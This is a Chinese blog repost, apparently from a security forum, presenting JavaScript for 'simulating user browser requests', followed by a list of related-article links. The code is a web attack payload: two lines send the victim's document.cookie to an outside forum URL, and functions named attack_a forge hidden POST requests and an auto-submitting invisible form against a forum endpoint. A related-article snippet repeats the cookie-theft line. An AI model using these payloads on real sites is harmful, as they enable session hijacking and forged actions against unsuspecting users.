JavaScript模拟用户发起浏览器请求(GET和POST)

最新推荐文章于 2024-08-08 09:12:41 发布
最新推荐文章于 2024-08-08 09:12:41 发布
阅读量3k 收藏 1
点赞数
分类专栏: javascript 文章标签: javascript ViewUI
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/test808/article/details/84429096
版权
from http://www.3g-sec.com/thread-1399-1-1.html 

<html>
<head>
<script>
//第一种GET方式
new Image().src="http://www.3g-sec.com/forum.php?cookie="+escape(document.cookie);
//第二种GET方式
location.href="http://www.3g-sec.com/forum.php?cookie="+escape(document.cookie);
//第一种POST方式(XMLHttpRequest普通POST)
xhr=function(){
    var request = false;
    if(window.XMLHttpRequest){
        request = new XMLHttpRequest();
    }else if (window.ActiveXObject){
        try{
            request = new window.ActiveXObject('Microsoft.XMLHTTP');
        }catch(e){
       }
    }

    return request;
}();

request = function(method,src,argv,content_type){
    xhr.open(method,src,false);//同步方式,异步把false改为true
    if(method=='POST')xhr.setRequestHeader('Content-type',content_type);
    //设置表单的content-type类型,常见的是application/x-www-form-urlencoded
    //如果是文件上传的表单则content-type为multipart/form-data第二个例子中会有
    xhr.send(argv);//发送POST数据
    return xhr.responseText;//返回响应的内容
};
attack_a = function(){
    var src     = "http://www.dzx2.com/forum.php";
    var argv_0  = "&name1=value1&name2=value2";
    request("POST",src,argv_0,"application/x-www-form-urlencoded");
};
attack_a();

//第二种POST方式(XMLHttpRequest文件上传POST)
xhr=function(){
    var request = false;
    if(window.XMLHttpRequest){
        request = new XMLHttpRequest();
    }else if (window.ActiveXObject){
        try{
            request = new window.ActiveXObject('Microsoft.XMLHTTP');
        }catch(e){         
        }
    }
    return request;
}();

request = function(method,src,argv,content_type){
    xhr.open(method,src,false);
    if(method=='POST')xhr.setRequestHeader('Content-type',content_type);
    xhr.send(argv);
    return xhr.responseText;
};

attack_a = function(){
    var src     = "http://www.dzx2.com/forum.php";
    var name1   = "value1";
    var name2   = "value2";
    var argv_0  = "\r\n";
    argv_0      +="---------------------7964f8dddeb95fc5\r\nContent-Disposition:form-data;name=\"name1\"\r\n\r\n";
    argv_0      +=(name1+"\r\n");
    argv_0      +="---------------------7964f8dddeb95fc5\r\nContent-Disposition:form-data;name=\"name2\"\r\n\r\n";
    argv_0      +=(name2+"\r\n");
    argv_0      +="---------------------7964f8dddeb95fc5\r\n";
    /*
        POST提交的参数是以---------------------7964f8dddeb95fc5分割的
        下面设置表单提交的Content-Type与form-data分隔边界为:
        multipart/form-data;boundary=---------------------7964f8dddeb95fc5
    */
    request("POST",src,argv_0,"multipart/form-data;boundary=---------------------7964f8dddeb95fc5"); 
}

attack_a();

//第三种POST方式(javascript实现表单自提交)
function new_form(){
    var f = document.createElement("form");
    document.body.appendChild(f);
    f.method = "post";
    return f;
}

function create_elements(eForm,eName,eValue){
    var e=document.createElement("input");
    eForm.appendChild(e);
    e.type='text';
    e.name=eName;
    if(!document.all){
        e.style.display='none';
    }else{
        e.style.display='block';
        e.style.width='0px';
        e.style.height='0px';
    }
    e.value=eValue;
    return e;
}
var _f=new_form();//创建一个form表单
create_elements(_f,"name1","value1");//创建form中的input对象
create_elements(_f,"name2","value2");
_f.action="http://www.dzx2.com/forum.php";//form提交地址
_f.submit();//提交
</script>
</head>
<body>
</body>
</html>


test808
关注
专栏目录
前端js模拟浏览器爬虫的解决方案
zyc__python的博客
06-11 1261
前端js模拟浏览器爬虫的解决方案 我们在开发爬虫的过程中喜欢使用Selenium + Chromedriver,然后在前端中一行Javascript代码就可以识别出来,从而把你干掉 首先我们用一下代码启动模拟浏览器 from selenium.webdriver import Chrome driver = Chrome() 如下图: 接下来我们用一行js代码来调试wind...
浏览器调试ajax请求
09-26
简单页面访问后台接口的一个样例,用于调试后台接口是否支持跨域,是否支持ajax请求,是否又正确的值返回前端,在postman正确的情况下浏览器不一定能成功,此时就需要用ajax模拟调用检查
javascript模拟用户发起浏览器请求
thislocal的博客
03-14 5460
一、HTTP的请求有好几种,我们常用的一般是GET和POST。 二、发起GET请求 GET请求实际上就是插入一个URL,方式有很多种。 比如新建一个img标签对象,使其src指向目标地址。 new image().src = "http://www.baidu.com" + escape(document.cookie); 也可以在地址栏里打开目标地址 location.href =
如何使用浏览器post请求
最新发布
m0_50736744的博客
08-08 2151
如何使用浏览器发送post请求进行测试。
JS的客户端浏览器模拟
专注-享学课堂
02-24 1482
PlatformJS JS
使用mock.js模拟网络请求
m0_59638475的博客
05-05 713
6.在src下新建utils文件夹,里面新建axios.js文件来封装一个网络请求。5.再mock文件夹下新建mockServe.js文件。login.json 文件(模拟响应回来的数据)7.封装接口API,src目录下新建文件夹api,3.在全局文件 main.js中引入axios。8.在需要使用的页面调接口即可。1.安装mock.js
jQuery异步请求模拟IE登录网站
weixin_34199405的博客
05-28 123
具体请求的登录验证页面后台逻辑处理,这里我们忽略,不在我们的学习范围内;关键的是使用jQuery异步请求方法,如下例子: 1 &lt;%@ Page Language="C#" AutoEventWireup="true" CodeBehind="Default.aspx.cs" Inherits="WebApplication1._Default" %&gt; 2 3 &lt...
2020-11-06
qq_47873808的博客
11-06 189
学习小结 什么是浏览器跨域访问操作,js如何实现? 什么是跨域? 跨域问题来源于浏览器的同源策略,浏览器为了提高网站的安全性,在发送ajax请求时,只有在当前页面地址与请求地址的协议+域名+端口号相同时才允许访问,否则会被拦截。 协议即通信协议,比如我们现在常见的http和https,如果当前页面地址使用http协议,请求的地址使用https协议,那么这个请求就存在跨域问题。 域名即网站网址,如baidu.com,360.com存在跨域。 端口号即域名对应的服务器的监听端口,这个我们一般是看不到的,因为一般
服务端模拟ajax支持发起GETPOSTPUTDELETE请求
08-12
本文将深入探讨如何使用JavaScript模拟GET、POST、PUT和DELETE请求,这些都是RESTful API中最常见的HTTP方法。 **一、GET请求** GET是最基础的HTTP请求方法,用于获取资源。在JavaScript中,我们可以使用`...
JavaScript源代码】解决vue $http的get和post请求跨域问题.docx
12-30
在Vue组件中,你可以这样发起GET和POST请求: ```javascript // GET请求 this.$http.get('/api/amdatashift/login/probe') .then(function(data) { // 处理成功响应 }) .catch(function() { console.log(...
python 模拟用户点击浏览器_浏览器行为模拟之requests、selenium模块
weixin_40002336的博客
11-24 7317
requests模块前言:通常我们利用Python写一些WEB程序、webAPI部署在服务端,让客户端request,我们作为服务器端response数据;但也可以反主为客利用Python的requests模块模拟浏览器行为,向其他站点发送request,让其他站点response数据给我们;一、requests模块介绍requests可以模拟浏览器请求,比起之前用到的urllib,reques...
python爬虫 基于requests模块发起ajax的get请求实现解析
09-18
代码首先指定了请求的URL和参数,然后定制了请求头信息,包括User-Agent字段,用于伪装成浏览器发起请求请求发送后,响应内容以JSON格式返回,通过json.loads()函数将JSON字符串转换为Python字典,便于进一步处理...
GET-POST-方法调用-使用jquery-和-javascript:您好,在此项目中,我上载了如何使用jquery和javascript和在线假API调用Call get and post方法。
01-30
在本文中,我们将深入探讨如何使用jQuery和JavaScript来执行GET和POST请求,以及如何与在线模拟API进行交互。这两种技术是Web开发中的基础工具,它们允许前端应用与服务器进行数据交换,实现动态网页功能。 首先,...
4. [使用 Puppeteer 在 Node.js模拟浏览器环境
初学者的专栏
05-27 1525
在这个示例中,我们首先导入 Puppeteer 模块,然后使用 `puppeteer.launch()` 方法创建一个浏览器实例。接着,我们使用 `browser.newPage()` 方法创建一个新的页面实例,并使用 `page.goto()` 方法加载 Google 的网页。最后,我们使用 `page.content()` 方法获取页面的 HTML 内容,并将其打印到控制台中。这只是 Puppeteer 的一个简单示例,它可以执行更复杂的任务,例如模拟用户交互、填写表单、截取屏幕截图等。
nodeJs模拟接口请求 记录
weixin_38588074的博客
04-18 1222
nodeJs模拟接口请求 记录
实现模拟浏览器环境操作_jsdom的安装和解析
晦涩难董先生
10-04 2076
在Node.js中安装canvas库可以让你在服务器端使用JavaScript来处理和生成图像,这对于某些应用来说是很有用的。安装cmd(管理员身份) -->
js模拟页面点击
yaoshanghuan的专栏
05-11 4750
http://www.w3.org/1999/xhtml">javascript模拟鼠标自动点击链接 - 中国asp之家function autoclick(){ lnk = document.getElementById("auto"); lnk.click();}//function alertXX(){ //alert("刚才一个链接被点击了,你没发现吗?")//}你不点我,会有人点我的
js模拟get请求方式
firewolf1758的专栏
10-10 4407
一、通过a标签模拟请求;&lt;a target="_blank" id="NewTagPage" style="display:none;"&gt;&lt;/a&gt;function showSource(value1,value2,value3){var url = BASE_URL + "sourcePlay?param1=" +value1 + "&amp;param2
apache + httpclient4 + jsoup 进行模拟浏览器url访问
热门推荐
sd4000784的专栏
05-12 1万+
Hi,各位好,好久不玩博客了,最近在新公司无聊的时候,在查看一个其他网站的注册源代码时 发现了一处bug 首先前台页面是这样的结构(不显示相关网站的敏感信息) 这是一个很普通的注册页面,ok,我们看看相关js源代码,找到免费获取验证码的功能 这段代码就是普通的校验手机号,然后发送给短信接口api,60秒的校验重复发送,不知道大家发现问题了吗? 我可以根据url恶意仿造这接口需要的
Python requests库详解:模拟POST请求JSON数据应用
2. POST请求更为私密,通常用于提交数据,如用户表单提交或API调用,其请求头和数据一般不会保存在浏览器历史中,抓包工具可捕获。 在使用requests库模拟POST请求时,关键步骤包括设置URL、请求头和数据。例如,...
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值